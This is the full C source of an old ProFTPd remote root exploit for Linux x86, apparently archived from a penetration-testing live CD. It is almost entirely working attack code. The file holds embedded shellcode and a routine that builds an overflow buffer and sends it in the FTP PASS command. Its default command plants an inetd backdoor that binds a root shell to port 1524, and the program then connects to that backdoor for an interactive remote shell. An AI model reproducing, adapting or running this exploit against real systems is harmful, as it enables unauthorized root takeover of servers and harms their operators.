home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / proftpd / own-proftpd.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  9.8 KB  |  452 lines
  1. /*
  2.  *  Copyright (c) 1999 anathema <anathema@hack.co.za>
  3.  *  All rights reserved.
  4.  *
  5.  *  own-proftpd.c
  6.  *  ProFTPd remote root overflow (linux x86)
  7.  *
  8.  *  This is *NOT* the overflow mentioned on Bugtraq, this is another
  9.  *  unpublished overflow within the ProFTPd code.
  10.  *
  11.  *  Try an alignment value of 1 to start with:
  12.  *    despair:~# ./own-proftpd onyx -a 1
  13.  */
  14.  
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <unistd.h>
  18. #include <ctype.h>
  19. #include <stdarg.h>
  20. #include <string.h>
  21. #include <memory.h>
  22. #include <sys/types.h>
  23. #include <sys/socket.h>
  24. #include <netinet/in.h>
  25. #include <arpa/inet.h>
  26. #include <netdb.h>
  27.  
  28. #define FTP_PORT        21
  29. #define BIND_PORT        1500
  30. #define BD_PORT            1524
  31. #define ADDR            0xbffff424
  32. #define RETPOS            932
  33.  
  34. char c0de[] =
  35.   "\x29\xc0\x29\xdb\x29\xc9\xb0\x46\xcd\x80\xeb\x64\x5b\x89\xd9\x80\xc1\x0f\x39"
  36.   "\xd9\x7c\x06\x80\x29\x04\x49\xeb\xf6\x29\xc0\x88\x43\x01\x88\x43\x08\x88\x43"
  37.   "\x10\x87\xf3\xb0\x0c\x8d\x5e\x07\xcd\x80\xb0\x27\x8d\x1e\x29\xc9\xcd\x80\x29"
  38.   "\xc0\xb0\x3d\xcd\x80\x29\xc0\xb0\x0c\x8d\x5e\x02\xcd\x80\x29\xc0\x88\x46\x03"
  39.   "\xb0\x3d\x8d\x5e\x02\xcd\x80\x29\xc0\x8d\x5e\x09\x89\x5b\x08\x89\x43\x0c\x88"
  40.   "\x43\x07\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\x29\xc0\x40\xcd\x80\xe8\x97"
  41.   "\xff\xff\xff\xff\xff\xff\x45\x45\x32\x32\x33\x32\x32\x33\x45\x33\x66\x6d\x72"
  42.   "\x33\x77\x6c";
  43.  
  44. u_long
  45. resolve_host(u_char *host_name)
  46. {
  47.   struct in_addr addr;
  48.   struct hostent *host_ent;
  49.  
  50.   addr.s_addr = inet_addr(host_name);
  51.   if (addr.s_addr == -1)
  52.     {
  53.       host_ent = gethostbyname(host_name);
  54.       if (!host_ent) return(0);
  55.       memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  56.     }
  57.  
  58.   return(addr.s_addr);
  59. }
  60.  
  61. void
  62. bind_portz(int sock, u_char *cmd)
  63. {
  64.   struct sockaddr_in sin;
  65.   u_char tmp[4096];
  66.   int asock, lsock, flen = 16;
  67.  
  68.   asock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  69.   if (asock == -1)
  70.     {
  71.       perror("socket allocation");
  72.       exit(-1);
  73.     }
  74.  
  75.   sin.sin_family = AF_INET;
  76.   sin.sin_port   = htons(BIND_PORT);
  77.   sin.sin_addr.s_addr = INADDR_ANY;
  78.  
  79.   if (bind(asock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  80.     {
  81.       perror("bind");
  82.       close(asock);
  83.       exit(-1);
  84.     }
  85.  
  86.   if (listen(asock, 10) == -1)
  87.     {
  88.       perror("listen");
  89.       close(asock);
  90.       exit(-1);
  91.     }
  92.  
  93.   lsock = accept(asock, (struct sockaddr *)&sin, &flen);
  94.   if (lsock == -1)
  95.     {
  96.       perror("accept");
  97.       close(asock);
  98.       exit(-1);
  99.     }
  100.  
  101.   memset(tmp, 0, sizeof(tmp));
  102.   recv(lsock, tmp, sizeof(tmp), 0);
  103.  
  104.   close(asock);
  105.   close(lsock);
  106.  
  107.   write(sock, cmd, strlen(cmd));
  108.   exit(0);
  109. }
  110.  
  111. u_long
  112. getlocalip(void)
  113. {
  114.   u_char host_name[1024];
  115.   u_long our_ip;
  116.  
  117.   memset(host_name, 0, sizeof(host_name));
  118.   if (gethostname(host_name, sizeof(host_name) - 1) == -1)
  119.     {
  120.       /*
  121.        *  Up to the caller to check for error.
  122.  [2000]*/
  123.       return(0);
  124.     }
  125.  
  126.   our_ip = resolve_host(host_name);
  127.   /*
  128.    *  If an error has occurred, resolve_host() will return 0 anyway,
  129.    *  which is what the caller should be checking for. Just return.
  130.    */
  131.   return(our_ip);
  132. }
  133.  
  134. static u_char *
  135. port_data(void)
  136. {
  137.   static u_char tmp[50];
  138.   struct in_addr addr;
  139.   u_char input[25];
  140.   int i = 0;
  141.  
  142.   memset(input, 0, sizeof(input));
  143.   addr.s_addr = getlocalip();
  144.   if (!addr.s_addr)
  145.     {
  146.       fprintf(stderr, "Cannot get local IP address.\n");
  147.       exit(-1);
  148.     }
  149.   strncpy(input, inet_ntoa(addr), sizeof(input) - 1);
  150.  
  151.   memset(tmp, 0, sizeof(tmp));
  152.   for (; i < strlen(input); i++)
  153.     {
  154.       if (input[i] == '.') input[i] = ',';
  155.     }
  156.  
  157.   strcpy(tmp, input);
  158.   strcat(tmp, ",5,220");
  159.  
  160.   return(tmp);
  161. }
  162.  
  163. static u_char *
  164. overflow_buf(u_int align, u_int offset)
  165. {
  166.   static u_char buf[4096];
  167.   u_long addr  = ADDR + offset;
  168.   u_int retpos = RETPOS + align;
  169.   int i = 0, j = 0;
  170.  
  171.   memset(buf, 0x90, sizeof(buf));
  172.  
  173.   for (i = retpos - strlen(c0de); i < retpos; j++, i++)
  174.     {
  175.       buf[i] = c0de[j];
  176.     }
  177.  
  178.   for (; i < (retpos + 75); i += 5)
  179.     {
  180.       buf[i+0] = (addr & 0xff);
  181.       buf[i+1] = (addr >> 8) & 0xff;
  182.       buf[i+2] = (addr >> 16) & 0xff;
  183.       buf[i+3] = (addr >> 16) & 0xff;
  184.       buf[i+4] = (addr >> 24) & 0xff;
  185.     }
  186.  
  187.   buf[i] = 0;
  188.  
  189.   return(buf);
  190. }
  191.  
  192. void
  193. get_data(int sock)
  194. {
  195.   u_char tmp[4096];
  196.  
  197.   memset(tmp, 0, sizeof(tmp));
  198.   recv(sock, tmp, sizeof(tmp), 0);
  199.   fprintf(stderr, "%s", tmp);
  200. }
  201.  
  202. void
  203. shellz(u_long dst_ip)
  204. {
  205.   struct sockaddr_in sin;
  206.   u_char sock_buf[4096];
  207.   fd_set fds;
  208.   int sock;
  209.  
  210.   fprintf(stderr,"Waiting for command to execute..\n");
  211.   /*
  212.    *  If you don't pause here, the exploit may try to connect() before
  213.    *  the command has executed, and so get ECONNREFUSED.
  214.    */
  215.   sleep(4);
  216.  
  217.   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  218.   if (sock == -1)
  219.     {
  220.       perror("socket allocation");
  221.       exit(-1);
  222.     }
  223.  
  224.   sin.sin_family = AF_INET;
  225.   sin.sin_port   = htons(BD_PORT);
  226.   sin.sin_addr.s_addr = dst_ip;
  227.  
  228.   if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  229.     {
  230.       perror("connecting to backdoor");
  231.       close(sock);
  232.       exit(-1);
  233.     }
  234.  
  235.   fprintf(stderr, "owned\n");
  236.   for (;;)
  237.     {
  238.       FD_ZERO(&fds);
  239.       FD_SET(0, &fds);      /* STDIN_FILENO */
  240.       FD_SET(sock, &fds);
  241.  
  242.       select(255, &fds, NULL, NULL, NULL);
  243.       memset(sock_buf, 0, sizeof(sock_buf));
  244.  
  245.       if (FD_ISSET(sock, &fds))
  246.         {
  247.           if (recv(sock, sock_buf, sizeof(sock_buf), 0) == -1)
  248.             {
  249.               fprintf(stderr, "Connection closed by remote host.\n");
  250.               close(sock);
  251.               exit(0);
  252.             }
  253.  
  254.           fprintf(stderr, "%s", sock_buf);
  255.         }
  256.  
  257.       if (FD_ISSET(0, &fds)) /* STDIN_FILENO */
  258.         {
  259.           read(0, sock_buf, sizeof(sock_buf)); /* STDIN_FILENO */
  260.           write(sock, sock_buf, strlen(sock_buf));
  261.         }
  262.     }
  263.  
  264.   /* NOTREACHED */
  265. }
  266.  
  267. void
  268. send_data(int sock, u_char *payload, ...)
  269. {
  270.   u_char tmp[4096];
  271.   va_list list;
  272.  
  273.   memset(tmp, 0, sizeof(tmp));
  274.   va_start(list, payload);
  275.   vsnprintf(tmp, sizeof(tmp), payload, list);
  276.   write(sock, tmp, strlen(tmp));
  277.   va_end(list);
  278.  
  279.   get_data(sock);
  280. }
  281.  
  282. void
  283. exploit(u_long dst_ip, u_short src_prt, u_short dst_prt, u_int align,
  284.         u_int offset, int alt_cmd, u_char *exec_cmd, u_char *retr_file)
  285. {
  286.   struct sockaddr_in sin;
  287.   u_char buf[4096], pdata[50];
  288.   int sock;
  289.  
  290.   memset(pdata, 0, sizeof(pdata));
  291.   strncpy(pdata, port_data(), sizeof(pdata) - 1);
  292.  
  293.   memset(buf, 0, sizeof(buf));
  294.   strncpy(buf, overflow_buf(align, offset), sizeof(buf) - 1);
  295.  
  296.   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  297.   if (sock == -1)
  298.     {
  299.       perror("socket allocation");
  300.       exit(-1);
  301.     }
  302.  
  303.   if (!fork()) bind_portz(sock, exec_cmd);
  304.  
  305.   if (src_prt)
  306.     {
  307.       struct sockaddr_in min;
  308.  
  309.       min.sin_family = AF_INET;
  310.       min.sin_port   = htons(src_prt);
  311.       min.sin_addr.s_addr = INADDR_ANY;
  312.  
  313.       if (bind(sock, (struct sockaddr *)&min, sizeof(struct sockaddr)) == -1)
  314.         {
  315.           perror("bind");
  316.           close(sock);
  317.           exit(-1);
  318.         }
  319.     }
  320.  
  321.   sin.sin_family = AF_INET;
  322.   sin.sin_port   = htons(FTP_PORT);
  323.   sin.sin_addr.s_addr = dst_ip;
  324.  
  325.   if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  326.     {
  327.       perror("connecting to ftp daemon");
  328.       close(sock);
  329.       exit(-1);
  330.     }
  331.  
  332.   get_data(sock);
  333.  
  334.   send_data(sock, "USER anonymous\n");
  335.   send_data(sock, "PASS %s\n", buf);
  336.   send_data(sock, "PORT %s\n", pdata);
  337.   send_data(sock, "RETR %s\n", retr_file);
  338.  
  339.   if (!alt_cmd)
  340.     {
  341.       shellz(dst_ip);
  342.       /* NOTREACHED */
  343.     }
  344.   sleep(2);
  345.   fprintf(stderr, "Completed.\n");
  346.   exit(0);
  347. }
  348.  
  349. void
  350. usage(u_char *nomenclature)
  351. {
  352.   fprintf(stderr,
  353.           "No.\nusage:\t%s dst_host|ip [ -s src_prt ] [ -d dst_prt ]\n"
  354.           "\t[ -a align ] [ -o offset ] [ -c alt_cmd ] [ -f alt_file ]\n",
  355.           nomenclature);
  356.   exit(-1);
  357. }
  358.  
  359. int
  360. main(int argc, char **argv)
  361. {
  362.   u_long dst_ip = 0;
  363.   u_short src_prt = 0, dst_prt = FTP_PORT;
  364.   u_int align = 0, offset = 0;
  365.   u_char cmd[255], retr_file[255];
  366.   int opt = 0, alt_cmd = 0, alt_file = 0;
  367.  
  368.   fprintf(stderr,
  369.           "ProFTPd remote root exploit\n"
  370.           "Copyright (c) anathema <anathema@hack.co.za>\n");
  371.  
  372.   if (argc < 2)
  373.     {
  374.       usage(argv[0]);
  375.       /* NOTREACHED */
  376.     }
  377.  
  378.   dst_ip = resolve_host(argv[1]);
  379.   if (!dst_ip)
  380.     {
  381.       fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
  382.       exit(-1);
  383.     }
  384.  
  385.   while ((opt = getopt(argc, argv, "s:d:a:o:c:f:")) != EOF)
  386.     {
  387.       switch(opt)
  388.         {
  389.         case 's':
  390.           src_prt  = (u_short)atoi(optarg);
  391.           break;
  392.         case 'd':
  393.           dst_prt  = (u_short)atoi(optarg);
  394.           break;
  395.         case 'a':
  396.           align    = (u_int)atoi(optarg);
  397.           break;
  398.         case 'o':
  399.           offset   = (u_int)atoi(optarg);
  400.           break;
  401.         case 'c':
  402.           snprintf(cmd, sizeof(cmd), "\n%s\n", optarg);
  403.           alt_cmd = 1;
  404.           break;
  405.         case 'f':
  406.           strncpy(retr_file, optarg, sizeof(retr_file) - 1);
  407.           alt_file = 1;
  408.           break;
  409.         default:
  410.           usage(argv[0]);
  411.           /* NOTREACHED */
  412.         }
  413.     }
  414.  
  415.   if (src_prt < 1024)
  416.     {
  417.       /*
  418.        *  If the user wants to specify a privileged source port, s/he
  419.        *  must be root, otherwise bind() will bail with EACCES.
  420.  [2000]*/
  421.       if (getuid() && geteuid())
  422.         {
  423.           fprintf(stderr, "Insufficient privilegez (uid|euid == 0)\n");
  424.           exit(-1);
  425.         }
  426.     }
  427.  
  428.   if (!alt_cmd)
  429.     {
  430.       /*
  431.        *  The user hasn't specified an alternative command to run.
  432.        *  Use the default of an ingreslock backdoor. If this is used,
  433.        *  the exploit will automatically connect to it, dropping the 
  434.        *  user into a remote shell.
  435.  [2000]*/
  436.       strcpy(cmd, "\necho \"ingreslock stream tcp nowait root /bin/sh sh -i\" >/tmp/x; /usr/sbin/inetd /tmp/x\n");
  437.     }
  438.  
  439.   if (!alt_file)
  440.     {
  441.       /*
  442.        *  No file to RETR(ieve) specified, use a reasonable default.
  443.  [2000]*/
  444.       strcpy(retr_file, "welcome.msg");
  445.     }
  446.  
  447.   exploit(dst_ip, src_prt, dst_prt, align, offset, alt_cmd, cmd, retr_file);
  448.   /* NOTREACHED */
  449. }
  450.  
  451.  
  452. /*                    www.hack.co.za              [2000]*/